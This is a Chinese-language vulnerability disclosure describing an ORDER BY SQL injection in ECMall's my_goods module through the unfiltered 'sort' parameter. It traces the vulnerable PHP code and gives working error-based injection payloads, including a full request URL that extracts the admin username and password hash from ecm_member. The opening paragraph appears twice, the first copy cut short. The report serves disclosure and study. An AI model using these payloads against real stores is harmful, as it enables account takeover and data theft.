### 简要描述: 本来想早点分析完然后奋斗ECSHOP...结果一直不给老衲机会啊,越来越不敢相信是不是官方版本了,是不是下错了.酒喝多了头有点晕.不知道有没有把分析写错... ### 详细说明: order by 参数注入,后面不能跟union,但是可以用双重查询. select...from...order by 1 and (select user_name from ecm_member where user_id=1) 或者 select...from...order by 1,(select user_name from ecm_member where user_id=1) 但是在第2个select里面可以用union select...from...order by 1 and (select user_name from ecm_member where user_id=1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by a)b) 或 select...from...order by 1,(select user_name from ecm_member where user_id=1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by a)b) app/my_goods.app.php ``` function index() { /* 取得店铺商品分类 */ $this->assign('sgcategories', $this->_get_sgcategory_options()); $conditions = $this->_get_conditions(); $page =...
### 简要描述: 本来想早点分析完然后奋斗ECSHOP...结果一直不给老衲机会啊,越来越不敢相信是不是官方版本了,是不是下错了.酒喝多了头有点晕.不知道有没有把分析写错... ### 详细说明: order by 参数注入,后面不能跟union,但是可以用双重查询. select...from...order by 1 and (select user_name from ecm_member where user_id=1) 或者 select...from...order by 1,(select user_name from ecm_member where user_id=1) 但是在第2个select里面可以用union select...from...order by 1 and (select user_name from ecm_member where user_id=1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by a)b) 或 select...from...order by 1,(select user_name from ecm_member where user_id=1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by a)b) app/my_goods.app.php ``` function index() { /* 取得店铺商品分类 */ $this->assign('sgcategories', $this->_get_sgcategory_options()); $conditions = $this->_get_conditions(); $page = $this->_get_page(); $page_nolimit = array(); $goods_list = $this->_get_goods($conditions, $page); //跟进 $all_goods = $this->_get_goods($conditions, $page_nolimit); ...... } function _get_goods($conditions, &$page) { if (intval($_GET['sgcate_id']) > 0) { $cate_mod =& bm('gcategory', array('_store_id' => $this->_store_id)); $cate_ids = $cate_mod->get_descendant_ids(intval($_GET['sgcate_id'])); } else { $cate_ids = 0; } // 标识有没有过滤条件 if ($conditions != '1 = 1' || !empty($_GET['sgcate_id'])) { $this->assign('filtered', 1); } //更新排序 if (isset($_GET['sort']) && isset($_GET['order'])) { $sort = strtolower(trim($_GET['sort'])); //未过滤 $order = strtolower(trim($_GET['order'])); if (!in_array($order,array('asc','desc'))) //只限制了order,没有限制sort { $sort = 'goods_id'; $order = 'desc'; } } else { $sort = 'goods_id'; $order = 'desc'; } if ($page) { $limit = $page['limit']; $count = true; } else { $limit = ''; $count = false; } /* 取得商品列表 */ $goods_list = $this->_goods_mod->get_list(array( 'conditions' => $conditions, 'count' => $count, 'order' => "$sort $order", //select...from...order by 注入 'limit' => $limit, ), $cate_ids); return $goods_list; } ``` includes/models/goods.model.php ``` function get_list($params = array(), $scate_ids = array(), $desc = false, $no_picture = true) { is_int($scate_ids) && $scate_ids > 0 && $scate_ids = array($scate_ids); extract($this->_initFindParams($params));//将上面数组的键名作为变量名,值作为变量的值(包含$order变量). ...... /* 条件(WHERE) */ $conditions = $this->_getConditions($conditions, true); $conditions .= " AND gs.spec_id IS NOT NULL AND s.store_id IS NOT NULL "; if ($scate_ids) { ...... } /* 排序(ORDER BY) */ if ($order) { $order = ' ORDER BY ' . $this->getRealFields($order) . ', s.sort_order '; //跟进 } /* 分页(LIMIT) */ $limit && $limit = ' LIMIT ' . $limit; if ($count) { $this->_updateLastQueryCount("SELECT COUNT(*) as c FROM {$tables}{$conditions}"); } /* 完整的SQL */ $this->temp = $tables . $conditions; $sql = "SELECT {$fields} FROM {$tables}{$conditions}{$order}{$limit}"; $goods_list = $index_key ? $this->db->getAllWithIndex($sql, $index_key) : $this->db->getAll($sql); //带入查询 ...... } ``` eccore/model/model.base.php ``` function getRealFields($src_fields_list) { $fields = $src_fields_list; if (!$src_fields_list) { $fields = ''; } $fields = preg_replace('/([a-zA-Z0-9_]+)\.([a-zA-Z0-9_*]+)/e', "\$this->_getFieldTable('\\1') . '.\\2'", $fields); //正则无影响... return $fields; } ``` http://localhost/ecmall/index.php?app=my_goods&act=index&order=asc&sort=1 and (select user_name from ecm_member where user_id=1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by a)b)%23 ### 漏洞证明: [<img src="https://images.seebug.org/upload/201309/260122499d31e628defba615112596407f3963b0.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201309/260122499d31e628defba615112596407f3963b0.jpg)
